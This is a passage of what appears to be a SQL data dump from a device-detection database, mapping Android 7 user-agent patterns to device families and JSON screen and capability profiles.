Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AS_501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AW790) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AX1015) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AX1016) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AX1071) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AX1073) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AX1073+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AX1074) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AX825) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AX922) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Action-X3 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Action-X3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Advance 5.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Advance A5 LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Advance A6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Advance Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Alba 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Alcatel 5085C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Alcatel_5044R) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Alcatel_6060C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Allure M1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Alpha) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Altice_S31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Amazing A30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Andromax A36C5H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_smartfren','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Aquaris M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Aquaris M5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Aquaris M5.5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Aquaris U Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Aquaris U Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Aquaris U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Aquaris U2 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Aquaris U2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Aquaris V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Aquaris X Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Aquaris X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Aquaris X5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Aquaris X5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Aquaris_A4.5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Archos 101 Platinum 3G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_archos','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Archos 101b Xenon) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_archos','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Archos 101c Helium) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_archos','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Archos 50f Neon) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":641,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Archos 97c Platinum) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_archos','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Archos Access 101 3G V2) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_archos','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Archos Access 45 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Archos Core 50 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Archos Saphir 50X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Archos Sense 47 X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Archos Sense 55 DC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Armor_2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Armor_2S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Astro 55N LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Avvio_A400) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Avvio_A50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Avvio_Pro450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Avvio_Pro550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; B140) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; B160) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; B255) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; B3-A40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; B3-A40) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; B3-A40FHD) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; B3-A42) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; B350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; B501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; B5070) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; B5532) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; B8416) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; B9502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; B9504) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; B9505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BAC-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BAC-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BAC-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BAC-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BAH-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BAH-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BAH-W09) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BBB100-1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":617,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BBB100-2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":617,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BBB100-7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":617,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BBC100-1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BEZKAM BK-RAM2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BG2-U01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 